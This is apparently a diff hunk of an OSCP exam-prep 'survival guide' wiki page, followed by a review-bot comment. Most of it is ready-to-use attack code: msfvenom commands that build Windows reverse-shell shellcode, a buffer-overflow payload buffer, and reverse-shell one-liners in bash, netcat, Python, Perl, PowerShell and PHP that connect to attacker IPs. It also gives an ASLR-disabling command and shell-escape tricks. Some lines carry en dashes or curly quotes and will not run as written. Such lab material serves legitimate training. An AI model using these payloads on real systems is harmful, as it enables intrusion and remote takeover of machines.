 +msfvenom -p windows/shell_reverse_tcp LHOST=10.11.1.111 LPORT=4433 -f python –e x86/shikata_ga_nai -b "\x00"
 +
 +msfvenom -p windows/shell_reverse_tcp lhost=10.11.1.111 lport=443 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f python -v shellcode
 +
 +8. Final buffer like:
 +buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
 +</code>
 +
 +
 +** Reverse Shells **
 +<code>
 +# Linux 
 +bash -i >& /dev/tcp/10.11.1.111/4443 0>&1
 +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.1.111 4443 >/tmp/f
 +nc -e /bin/sh 10.11.1.111 4443
 +
 +# Python
 +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.1.111",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 +
 +__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4433 >/tmp/f')-1\
 +
 +# Perl
 +perl -e 'use Socket;$i="10.11.1.111";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 +
 +# Windows
 +nc -e cmd.exe 10.11.1.111 4443
 +powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 +
 +# PHP most simple Linux
 +<?php $sock = fsockopen("10.11.1.111",1234); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);?>
 +</code>
 +
 +
 +
 +
 +**Disable ASLR on linux machine**
 +<code>
 +echo 0 > /proc/sys/kernel/randomize_va_space
 +</code>
 +
 +
 +
 +
 +**Get full shell on jail shelle**
 +<code>
 +python -c “import pty;pty.spawn(‘/bin/sh’);” 
 +echo ‘os.system(‘/bin/bash’)’
 +perl -e ‘exec “/bin/sh”;’
 +</code>
 +
 +
 +
 +
 +** Find and locate the flags  **
 +<code>
 +#Linux:
 +echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "
 +find / -name "network-secret.txt"
 +locate "network-secret.txt"
 +
 +#Windows:
 +echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Users\Administrator\Desktop\proof.txt" 2> nul & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt" 2> nul & type %USERPROFILE%\Desktop\proof.txt 2> nul
 +dir /s /b network-secret.txt
 +</code>
 +
 +
 +**Note template**
 +<code>
 +To work fast use CherryTree to take notes and use this template :
 +https://ceso.github.io/files/oscp/template_pwk.ctb
 +</code>
 +
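Review bot: the MS17-010 `msfvenom` line lost a token when the address was scrubbed: `LHOST=10.11.17.LPORT=443` is now one malformed argument, so the command fails; it should read `LHOST=10.11.17.x LPORT=443` (placeholder octet plus the space). Other lines in this hunk that will not run as pasted: `mount -t 10.11.1.111:/ /tmp/NFS` in the NFS section passes the server path where `-t` expects a filesystem type (the Rpcbind section already shows the `-t nfs` form); the `nmap ... –script=mysql-audit,...` line under **mysql** and `-f python –e x86/shikata_ga_nai` under **BOF** use an en dash, which the shell does not treat as `--` or `-`; and the three one-liners under "Get full shell on jail shelle" use typographic quotes (`“ ” ‘ ’`) instead of ASCII quotes, and that heading should read "jail shell". Finally, "Port 161/162 UDP - SNMP" duplicates the "Port 161 - SNMP" block added in the previous hunk with the same `nmap ... --script=snmp-netstat,snmp-processes` invocation; merging them keeps one entry per service.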
oscp_survival_guide.txt · Last modified: 2021/02/06 22:47 by M0N5T3R